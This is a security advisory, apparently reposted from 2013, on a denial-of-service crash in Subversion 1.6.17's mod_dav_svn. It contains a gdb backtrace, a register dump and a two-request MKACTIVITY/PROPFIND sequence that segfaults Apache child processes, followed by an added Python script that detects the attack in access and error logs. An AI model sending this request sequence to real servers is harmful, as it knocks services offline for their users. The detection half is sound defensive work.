Subversion 1.6.17 Denial Of Service
Source: vfocus.net Author: AKAT-1 Published: 2013-03-08
#########################
# Subversion MKACTIVITY #
#########################
#
# Authors:
#
# 22733db72ab3ed94b5f8a1ffcde850251fe6f466
# c8e74ebd8392fda4788179f9a02bb49337638e7b
# AKAT-1
#
#######################################

# libsvn_fs's svn_fs_file_length() fun
# tested on 1.6.17 and a few others

(gdb) where
#0  0x00007f2595db9d60 in svn_fs_file_length () from /usr/lib/x86_64-linux-gnu/libsvn_fs-1.so.1
#1  0x00007f25961f2d8b in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#2  0x00007f25961f37c5 in dav_svn__insert_all_liveprops () from /usr/lib/apache2/modules/mod_dav_svn.so
#3  0x00007f259682b37a in dav_run_insert_all_liveprops (r=0x7f2590df10a0, resource=0x7fff6e97e1a8, what=DAV_PROP_INSERT_VALUE, phdr=0x7fff6e97dff0) at mod_dav.c:4889
#4  0x00007f259682bc55 in dav_get_allprops (propdb=0x7f258d0db3d0, what=DAV_PROP_INSERT_VALUE) at props.c:655
#5  0x00007f2596824f5e in dav_propfind_walker (wres=0x7fff6e97e188, calltype=<optimized out>) at mod_dav.c:1949
#6  0x00007f25961fc6d1 in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#7  0x00007f25961fcb6d in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#8  0x00007f2596829bda in dav_method_propfind (r=0x7f2590df10a0) at mod_dav.c:2081
#9  dav_handler (r=0x7f2590df10a0) at mod_dav.c:4681
#10 dav_handler (r=0x7f2590df10a0) at mod_dav.c:4587
#11 0x00007f259e568b50 in ap_run_handler (r=0x7f2590df10a0) at config.c:159
#12 0x00007f259e568f9b in ap_invoke_handler (r=r@entry=0x7f2590df10a0) at config.c:377
#13 0x00007f259e579078 in ap_process_request (r=r@entry=0x7f2590df10a0) at http_request.c:282
#14 0x00007f259e575f38 in ap_process_http_connection (c=0x7f25917c0290) at http_core.c:190
#15 0x00007f259e56f510 in ap_run_process_connection (c=0x7f25917c0290) at connection.c:43
#16 0x00007f259e56f8f8 in ap_process_connection (c=c@entry=0x7f25917c0290, csd=<optimized out>) at connection.c:190
#17 0x00007f259e57dc2e in child_main (child_num_arg=child_num_arg@entry=6) at prefork.c:667
#18 0x00007f259e57e382 in make_child (slot=6, s=0x7f259e4d6818) at prefork.c:768
#19 make_child (s=0x7f259e4d6818, slot=6) at prefork.c:696
#20 0x00007f259e57eee6 in perform_idle_server_maintenance (p=<optimized out>) at prefork.c:903
#21 ap_mpm_run (_pconf=_pconf@entry=0x7f259e515028, plog=<optimized out>, s=s@entry=0x7f259e4d6818) at prefork.c:1107
#22 0x00007f259e553826 in main (argc=3, argv=0x7fff6e97e9b8) at main.c:755
(gdb)
(gdb) i r
rax            0x7fff6e97e1e0   140735048835552
rbx            0x7fff6e97e1a8   140735048835496
rcx            0x7f2590df7028   139799321079848
rdx            0x0      0
rsi            0x0      0
rdi            0x7fff6e97dec8   140735048834760
rbp            0x3      0x3
rsp            0x7fff6e97de78   0x7fff6e97de78
r8             0x7f2596833ee0   139799415701216
r9             0x1      1
r10            0x1      1
r11            0x1      1
r12            0x4e24   20004
r13            0x7f2590e08028   139799321149480
r14            0x7fff6e97dff0   140735048835056
r15            0x7f2590df7028   139799321079848
rip            0x7f2595db9d60   0x7f2595db9d60 <svn_fs_file_length>
eflags         0x246    [ PF ZF IF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb) x/i $rip
=> 0x7f2595db9d60 <svn_fs_file_length>: mov    0x30(%rsi),%rax
(gdb) x/x $rsi
0x0:    Cannot access memory at address 0x0


Basically, it takes >= 2 requests to crash an Apache child process (in mod_dav_svn / libsvn_fs):
-- cut --
1. MKACTIVITY /egg/!svn/act/foo HTTP/1.1
2. PROPFIND /egg/!svn/act/foo HTTP/1.1 (sigsegv)
-- cut --
EOF
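
An added detection example, not part of the original advisory: it correlates MKACTIVITY requests on `/!svn/act/` URLs in the access log with child segfault notices in the error log. The function name `find_suspects`, the 60-second window, the Apache 2.2-style log formats and the sample log lines are assumptions made for illustration.

```python
import re
from datetime import datetime, timedelta

# Common/combined access log: host ident user [time zone] "METHOD path proto" status
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\] ]+)[^\]]*\] "(\S+) (\S+)[^"]*" (\d{3})')
# Notice the parent writes to an Apache 2.2-style error log when a child dies (assumed format)
SEGV_RE = re.compile(r'^\[([^\]]+)\] \[notice\] child pid (\d+) exit signal Segmentation fault')
ACTIVITY_RE = re.compile(r'/!svn/act/[^/?]+$')

def find_suspects(access_lines, error_lines, window=timedelta(seconds=60)):
    """Correlate requests on /!svn/act/ URLs with child-process segfaults."""
    created = {}    # activity path -> (time, client) of the MKACTIVITY request
    findings = []
    for line in access_lines:
        m = ACCESS_RE.match(line)
        if not m or not ACTIVITY_RE.search(m.group(4)):
            continue
        host, stamp, method, path, _status = m.groups()
        ts = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S")  # local time, offset dropped
        if method == "MKACTIVITY":
            created[path] = (ts, host)
        elif method == "PROPFIND" and path in created:
            # Only logged when the child survived the request (e.g. a fixed build)
            findings.append(("propfind-on-activity", host, path, None))
    for line in error_lines:
        m = SEGV_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%a %b %d %H:%M:%S %Y")
        for path, (mk_ts, host) in created.items():
            # A child that segfaults in the handler never writes its access-log entry,
            # so the crashing PROPFIND shows up only as this error-log notice.
            if timedelta(0) <= ts - mk_ts <= window:
                findings.append(("segv-after-mkactivity", host, path, int(m.group(2))))
    return findings

# Constructed sample logs (not taken from the original page)
SAMPLE_ACCESS = [
    '192.0.2.10 - alice [08/Mar/2013:11:00:00 +0100] "MKACTIVITY /egg/!svn/act/3f1c HTTP/1.1" 201 312',
    '192.0.2.10 - alice [08/Mar/2013:11:00:01 +0100] "GET /egg/trunk/README HTTP/1.1" 200 100',
    '198.51.100.7 - - [08/Mar/2013:12:00:01 +0100] "MKACTIVITY /egg/!svn/act/foo HTTP/1.1" 201 312',
]
SAMPLE_ERROR = [
    '[Fri Mar 08 12:00:03 2013] [notice] child pid 4242 exit signal Segmentation fault (11)',
]

if __name__ == "__main__":
    for finding in find_suspects(SAMPLE_ACCESS, SAMPLE_ERROR):
        print(finding)
```

MKACTIVITY on its own is part of a normal Subversion commit, so the signal is the pairing with a segfault notice or with a PROPFIND on the same activity URL; tune the window to the server's load.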

 